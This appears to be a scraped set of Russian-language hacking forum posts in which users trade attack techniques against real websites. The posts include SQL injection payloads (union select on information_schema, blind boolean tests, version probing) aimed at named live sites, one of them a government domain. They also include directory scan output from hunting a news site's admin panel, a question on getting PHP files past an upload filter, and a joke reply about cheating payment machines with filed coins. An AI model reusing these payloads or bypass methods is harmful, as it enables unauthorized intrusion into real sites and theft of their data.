2DrakonSerg пробуй варианты с POST запросом или скинь линк на ресурс в ПМ если после поиска в урле есть типо такого то... приме: search.php?go=search&action=se&search=123456789')+union+select+1,2,table_name,4,5,14+from+information_schema.tables+--+
Попробуй влиять на запрос, как при get-запросе. Например: при вводе в поле поиска Code: 1 - получаешь результат "А", при вводе Code: 1+AND+1=1 - получаешь результат "А", а при вводе Code: 1+AND+1=2 - получаешь резульата "В". Ошибка не является sql-инъекцией, а вот влияние на результат запроса - ДА.
Потому что в joomle во многих случаях используется чистый md5 хешь. Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
попробуй): Code: http://www.bicentenary.tas.gov.au/page.php?id=-66+or+1=1+and+substring(version(),1,1)=3
2 CyberHunter http://www.bicentenary.tas.gov.au/print.php?id=127+and+substring(version(),1,1)=3 3 ветка
Я так понимаю ты хочешь его распаковать, а не открыть. Зависит от того, какой архив и какая ОС. В линуксе так: tgz или tar.gz - tar -zxvf < file > tar.bz2 - tar -xvfj < file > zip - unzip < file > rar - unrar x < file > В виндовс: Ищи директорию с архиватором. Для ВинРар: > cd C:\Program Files\WinRAR\ > unrar e < file >
Не могу найти админку, сканером только это нашел. » http://www.onlinenews.com.pk/Team/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/plesk-stat/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/preview/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/site/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/css/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/db/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/favicon.ico HTTP 200 OK » http://www.onlinenews.com.pk/images/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/img/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/index.php HTTP 200 OK » http://www.onlinenews.com.pk/news/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/picture_library/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/team/ HTTP 403 Forbidden » http://www.onlinenews.com.pk/weather/ HTTP 403 Forbidden
Win32, Льёшь этот файл http://disk.re4ka.net/files/70985850/pclzip.lib.php на сервер. Потом в тойже папке создаёшь файл, unzip.php PHP: <?php set_time_limit(0); $file='file.zip'; require_once('pclzip.lib.php'); $zip = new PclZip($file); $ext = $zip->extract(); if($ext==0) die("Ошибка! ".$zip->errorInfo(true)); foreach ($ext as $val) { echo $val['filename']."<br />"; } echo "<b>Файлы успешно извлечены!!</b>"; ?> $file как бы твой zip файл.
ребят в админке есть место для загрузки картинок,стоит фильтр,не могу загрузить php файл.. переименовал файл в php.jpg ,файл загрузилось,но не интерпретируется.. есть еще методы обхода фильтрации?
У меня возле дома стоит автомат по приёму платежей. Он принимает купюры и монеты. Я попробывал засунуть туда рулон туалетной бумаги с написанной на ней цифрой 1000 - не сработало. В монетоприёмник засовывал жетоны на метро - не катит, а крышка от колодца туда не полезла Можно как-то обойти проверку?
Если попробовать порезать тысячу на пополам и аккуратно приклеить к двум рулочикам туалетной бумаги может прокатит, и получиться две тысячи. А с жетонами - попробуй им бока подпилить об бордюр , мы так еще в детстве делали, когда автомат принимал 5 рублёвки а мы в него запихивали 50 копеечные ( или рублёвые, не помню ) старые со спиленными боками и принимал. Попробуй, если не получиться, то пиши, придумаем еще что-нибудь
Спасибо, я пожалуй воздержусь от такого зрелища. Всё зависит от кода и настроек сервака. Да, если админ конченный кретин и у него не зарегистрировано jpg это прокатит, но я таких не видел. А при тех условиях что ты дал можно гадать бесконечно и может прокатить любой вариант или не прокатить не один при нормальной реализации проверки
